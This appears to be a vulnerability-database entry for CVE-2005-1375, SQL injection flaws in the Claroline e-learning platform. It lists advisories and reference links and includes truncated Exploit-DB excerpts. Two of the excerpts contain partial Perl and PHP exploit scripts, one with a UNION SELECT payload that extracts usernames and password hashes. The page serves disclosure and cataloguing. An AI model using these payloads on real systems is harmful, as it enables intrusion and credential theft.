CVE-2005-1375
published 2005-05-03CVE-2005-1375: Multiple SQL injection vulnerabilities in Claroline 1.5.3 through 1.6 Release Candidate 1, and possibly Dokeos, allow remote attackers to execute arbitrary SQL…
PriorityP339high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.76%
84.4th percentile
Multiple SQL injection vulnerabilities in Claroline 1.5.3 through 1.6 Release Candidate 1, and possibly Dokeos, allow remote attackers to execute arbitrary SQL commands via (1) learningPath.php, (2) learningPathAdmin.php, (3) learnPath_details.php, (4) modules_pool.php, (5) module.php, (6) uInfo parameter in userInfo.php, or (7) exo_id parameter to exercises_details.php.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| claroline | claroline | — | — |
| claroline | claroline | — | — |
| claroline | claroline | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Claroline E-Learning 1.6 - Remote Hash SQL Injection (2)
exploitdb·2005-06-19
CVE-2005-1375 Claroline E-Learning 1.6 - Remote Hash SQL Injection (2)
Claroline E-Learning 1.6 - Remote Hash SQL Injection (2)
---
#!/usr/bin/perl
# Claroline E-Learning Application Remote SQL Exploit
# [K-C0d3r]
# This tools and to consider only himself to educational purpose
# Bug discovered by
# Greetz to mZ, 2b TUBE, off, rikky, str0ke, x0n3-h4ck, MWC
# [K-C0d3r]
use IO::Socket;
sub Usage {
print STDERR "Usage: KCcol-xpl.pl \n";
print STDERR "Targets:\n1 - userInfo.php\n";
print STDERR "2 - exercises_details.php\n";
exit;
}
if (@ARGV 3)
{
Usage();
}
if (@ARGV == 3)
{
$host = @ARGV[0];
$path = @ARGV[1];
$target = @ARGV[2];
print "[K-C0d3r] Claroline E-Learning Application Remote SQL Exploit [K-C0d3r]\n";
print "[+] Connecting to $host\n";
$sqli = "%20UNION%20SELECT%20pn_uname,null,pn_uname,pn_pass,pn_pass,null,pn_pass,null";
$sqli .= "%20FROM%20pn
Exploit-DB
Claroline E-Learning 1.6 - Remote Hash SQL Injection (1)
exploitdb·2005-06-17
CVE-2005-1375 Claroline E-Learning 1.6 - Remote Hash SQL Injection (1)
Claroline E-Learning 1.6 - Remote Hash SQL Injection (1)
---
Alpha_programmer , Oil_karchack , Dr_CephaleX , Str0ke
#
# And Iranian Hacking & Security Teams :
# IHS TeaM , alphaST , Shabgard Security Team , Emperor Hacking Team ,
# Crouz Security Team & Simorgh-ev Security Team
#############################################################################
# ___________Config :
# please replace your address :
$url = "http:///www.example.com";
# Please replace your name file ( userInfo.php Or exercises_details.php )
$file1 = "userInfo.php";
# please replace your dir address :
$dirs = "/dir/to/claroline/user/";
# __________End Config
#############################################################################
if ( $file1 == "userInfo.php" ) {
$merg = $dirs.$file1;
$fc = fsockopen("$url", 80
Exploit-DB
Claroline E-Learning 1.5/1.6 - 'exercises_details.php?exo_id' SQL Injection
exploitdb·2005-04-27
CVE-2005-1375 Claroline E-Learning 1.5/1.6 - 'exercises_details.php?exo_id' SQL Injection
Claroline E-Learning 1.5/1.6 - 'exercises_details.php?exo_id' SQL Injection
---
source: https://www.securityfocus.com/bid/13407/info
Multiple remote input validation vulnerabilities affect Claroline e-Learning Application. These issues are due to a failure of the application to properly sanitize user-supplied input prior to using it to carry out critical application functionality such as database interaction and generating dynamic Web content.
Multiple cross-site scripting, SQL injection, directory traversal, and remote file include vulnerabilities have been reported.
An attacker may exploit these issues to manipulate SQL queries to the underlying database, have arbitrary script code executed in the browser of an unsuspecting user, and execute arbitrary server-side scripts with the pr
Exploit-DB
Claroline E-Learning 1.5/1.6 - 'userInfo.php' Multiple SQL Injections
exploitdb·2005-04-27
CVE-2005-1375 Claroline E-Learning 1.5/1.6 - 'userInfo.php' Multiple SQL Injections
Claroline E-Learning 1.5/1.6 - 'userInfo.php' Multiple SQL Injections
---
source: https://www.securityfocus.com/bid/13407/info
Multiple remote input validation vulnerabilities affect Claroline e-Learning Application. These issues are due to a failure of the application to properly sanitize user-supplied input prior to using it to carry out critical application functionality such as database interaction and generating dynamic Web content.
Multiple cross-site scripting, SQL injection, directory traversal, and remote file include vulnerabilities have been reported.
An attacker may exploit these issues to manipulate SQL queries to the underlying database, have arbitrary script code executed in the browser of an unsuspecting user, and execute arbitrary server-side scripts with the privileg
No writeups or analysis indexed.
http://marc.info/?l=bugtraq&m=111464607103407&w=2http://secunia.com/advisories/15161http://secunia.com/advisories/15725http://securitytracker.com/id?1013822http://www.claroline.net/news.php#85http://www.securityfocus.com/bid/13407https://exchange.xforce.ibmcloud.com/vulnerabilities/20298http://marc.info/?l=bugtraq&m=111464607103407&w=2http://secunia.com/advisories/15161http://secunia.com/advisories/15725http://securitytracker.com/id?1013822http://www.claroline.net/news.php#85http://www.securityfocus.com/bid/13407https://exchange.xforce.ibmcloud.com/vulnerabilities/20298
2005-05-03
Published